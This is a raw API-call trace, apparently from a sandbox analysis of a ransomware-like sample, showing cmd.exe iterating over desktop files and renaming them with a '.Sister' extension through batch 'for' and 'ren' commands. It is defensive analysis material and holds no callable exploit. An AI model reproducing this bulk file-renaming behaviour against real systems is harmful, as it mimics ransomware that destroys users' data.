lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed95fff80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0175.425] SetErrorMode (uMode=0x0) returned 0x1 [0175.425] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0175.425] GetProcessHeap () returned 0x21ed8c70000 [0175.425] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484850 [0175.426] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0175.426] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0175.426] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0175.426] GetLastError () returned 0x2 [0175.426] ??_V@YAXPEAX@Z () returned 0x1 [0175.426] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.426] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.426] malloc (_Size=0xffce) returned 0x21ed960ff60 [0175.426] ??_V@YAXPEAX@Z () returned 0x21ed960ff60 [0175.426] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0175.426] GetLastError () returned 0x2 [0175.426] _get_osfhandle (_FileHandle=2) returned 0x54 [0175.426] GetFileType (hFile=0x54) returned 0x2 [0175.426] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0175.426] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0175.439] _get_osfhandle (_FileHandle=2) returned 0x54 [0175.439] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0175.451] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0175.451] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0175.451] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0175.471] longjmp () [0175.471] ??_V@YAXPEAX@Z () returned 0x1 [0175.471] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x11c9b, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="rcZz1_vwUIy4k7qcs3.mp3", cAlternateFileName="")) returned 1 [0175.471] GetProcessHeap () returned 0x21ed8c70000 [0175.471] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379ef0, Size=0x3c8) returned 0x21ed9379ef0 [0175.472] GetProcessHeap () returned 0x21ed8c70000 [0175.472] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379ef0) returned 0x3c8 [0175.472] GetProcessHeap () returned 0x21ed8c70000 [0175.472] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69a20 [0175.472] GetProcessHeap () returned 0x21ed8c70000 [0175.472] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69a20, Size=0x30) returned 0x21ed8d69a20 [0175.472] GetProcessHeap () returned 0x21ed8c70000 [0175.472] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69a20) returned 0x30 [0175.472] GetProcessHeap () returned 0x21ed8c70000 [0175.472] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69a60 [0175.472] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c0c0 [0175.474] ??_V@YAXPEAX@Z () returned 0x1 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69a60, Size=0x1e0) returned 0x21ed8d69a60 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69a60) returned 0x1e0 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69c50 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69c50, Size=0x290) returned 0x21ed8d69c50 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69c50) returned 0x290 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69ef0 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69ef0, Size=0x30) returned 0x21ed8d69ef0 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69ef0) returned 0x30 [0175.474] GetProcessHeap () returned 0x21ed8c70000 [0175.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69f30 [0175.474] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0175.475] GetProcessHeap () returned 0x21ed8c70000 [0175.475] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8d6dfa0 [0175.475] ??_V@YAXPEAX@Z () returned 0x1 [0175.475] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0175.475] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64bc0 [0175.475] FindClose (in: hFindFile=0x21ed8d64bc0 | out: hFindFile=0x21ed8d64bc0) returned 1 [0175.475] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65340 [0175.475] FindClose (in: hFindFile=0x21ed8d65340 | out: hFindFile=0x21ed8d65340) returned 1 [0175.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x930c9cd6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x930c9cd6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64f80 [0175.476] FindClose (in: hFindFile=0x21ed8d64f80 | out: hFindFile=0x21ed8d64f80) returned 1 [0175.476] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x11c9b, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="rcZz1_vwUIy4k7qcs3.mp3", cAlternateFileName="RCZZ1_~1.MP3")) returned 0x21ed8d64bc0 [0175.476] FindClose (in: hFindFile=0x21ed8d64bc0 | out: hFindFile=0x21ed8d64bc0) returned 1 [0175.477] _wcsnicmp (_String1="RCZZ1_~1.MP3", _String2="rcZz1_vwUIy4k7qcs3.mp3", _MaxCount=0x16) returned 8 [0175.477] malloc (_Size=0x1ff9c) returned 0x21ed961ff40 [0175.478] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0175.479] GetProcessHeap () returned 0x21ed8c70000 [0175.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8610 [0175.479] ??_V@YAXPEAX@Z () returned 0x1 [0175.479] ??_V@YAXPEAX@Z () returned 0x1 [0175.479] GetProcessHeap () returned 0x21ed8c70000 [0175.479] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69f30, Size=0x1e0) returned 0x21ed8d69f30 [0175.479] GetProcessHeap () returned 0x21ed8c70000 [0175.479] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69f30) returned 0x1e0 [0175.479] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0175.479] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.480] GetFileType (hFile=0x50) returned 0x2 [0175.480] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.480] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0175.490] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.490] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0175.613] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0175.613] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0175.613] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0175.613] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.613] GetFileType (hFile=0x50) returned 0x2 [0175.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.613] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0175.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.645] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0175.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.740] GetFileType (hFile=0x50) returned 0x2 [0175.740] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.740] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0175.776] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.776] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69a30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d69a30*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0175.820] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rcZz1_vwUIy4k7qcs3.mp3\" \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" ") returned 58 [0175.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.820] GetFileType (hFile=0x50) returned 0x2 [0175.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.820] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0175.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.838] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0175.884] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0175.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.884] GetFileType (hFile=0x50) returned 0x2 [0175.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.884] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0175.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.914] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0176.033] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0176.034] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.034] GetFileType (hFile=0x50) returned 0x2 [0176.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.034] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.150] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.150] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0176.164] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0176.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.164] GetFileType (hFile=0x50) returned 0x2 [0176.164] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.164] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.184] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0176.206] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0176.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.206] GetFileType (hFile=0x50) returned 0x2 [0176.206] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.206] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.219] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0176.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.248] GetFileType (hFile=0x50) returned 0x2 [0176.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.249] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0176.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.264] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69f00*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d69f00*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0176.283] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.bat\" ") returned 58 [0176.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.283] GetFileType (hFile=0x50) returned 0x2 [0176.283] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.283] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0176.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.304] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0176.324] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0176.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.324] GetFileType (hFile=0x50) returned 0x2 [0176.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0176.324] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0176.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0176.335] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0176.371] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0176.387] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0176.387] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0176.387] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.387] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.387] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0176.387] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0176.387] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0176.387] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0176.388] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0176.388] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0176.388] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0176.388] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0176.388] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0176.388] ??_V@YAXPEAX@Z () returned 0x1 [0176.388] GetProcessHeap () returned 0x21ed8c70000 [0176.388] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed9378c80 [0176.388] GetProcessHeap () returned 0x21ed8c70000 [0176.388] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378c80, Size=0x84) returned 0x21ed9378c80 [0176.388] GetProcessHeap () returned 0x21ed8c70000 [0176.388] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378c80) returned 0x84 [0176.388] GetProcessHeap () returned 0x21ed8c70000 [0176.388] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed9496da0 [0176.388] GetProcessHeap () returned 0x21ed8c70000 [0176.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed937ec00 [0176.389] GetProcessHeap () returned 0x21ed8c70000 [0176.389] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ec00, Size=0x84) returned 0x21ed937ec00 [0176.389] GetProcessHeap () returned 0x21ed8c70000 [0176.389] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ec00) returned 0x84 [0176.389] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.389] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.389] GetProcessHeap () returned 0x21ed8c70000 [0176.389] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65580 [0176.389] GetProcessHeap () returned 0x21ed8c70000 [0176.390] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9486320 [0176.390] _wcsicmp (_String1="rcZz1_vwUIy4k7qcs3.mp3", _String2=".") returned 68 [0176.390] _wcsicmp (_String1="rcZz1_vwUIy4k7qcs3.mp3", _String2="..") returned 68 [0176.390] GetFileAttributesW (lpFileName="rcZz1_vwUIy4k7qcs3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3")) returned 0x20 [0176.390] GetProcessHeap () returned 0x21ed8c70000 [0176.390] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94f7510 [0176.392] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94f7520 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0176.392] SetErrorMode (uMode=0x0) returned 0x0 [0176.392] SetErrorMode (uMode=0x1) returned 0x0 [0176.392] GetFullPathNameW (in: lpFileName="rcZz1_vwUIy4k7qcs3.mp3", nBufferLength=0x7fe7, lpBuffer=0x21ed961ff40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3", lpFilePart=0xa6cf4fd660*="rcZz1_vwUIy4k7qcs3.mp3") returned 0x2e [0176.392] SetErrorMode (uMode=0x0) returned 0x1 [0176.392] GetProcessHeap () returned 0x21ed8c70000 [0176.392] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9482630 [0176.392] _wcsicmp (_String1="rcZz1_vwUIy4k7qcs3.mp3", _String2=".") returned 68 [0176.393] _wcsicmp (_String1="rcZz1_vwUIy4k7qcs3.mp3", _String2="..") returned 68 [0176.393] GetFileAttributesW (lpFileName="rcZz1_vwUIy4k7qcs3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3")) returned 0x20 [0176.393] ??_V@YAXPEAX@Z () returned 0x1 [0176.393] malloc (_Size=0xffce) returned 0x21ed961ff40 [0176.393] ??_V@YAXPEAX@Z () returned 0x21ed961ff40 [0176.393] malloc (_Size=0xffce) returned 0x21ed962ff20 [0176.393] ??_V@YAXPEAX@Z () returned 0x21ed962ff20 [0176.394] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3")) returned 0x20 [0176.394] malloc (_Size=0xffce) returned 0x21ed923fd00 [0176.394] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0176.394] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3", fInfoLevelId=0x1, lpFindFileData=0x21ed9486330, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9486330) returned 0x21ed8d64fe0 [0176.394] malloc (_Size=0xffce) returned 0x21ed924fce0 [0176.394] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0176.394] ??_V@YAXPEAX@Z () returned 0x1 [0176.394] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rczz1_vwuiy4k7qcs3.mp3.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0176.405] FindNextFileW (in: hFindFile=0x21ed8d64fe0, lpFindFileData=0x21ed9486330 | out: lpFindFileData=0x21ed9486330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, 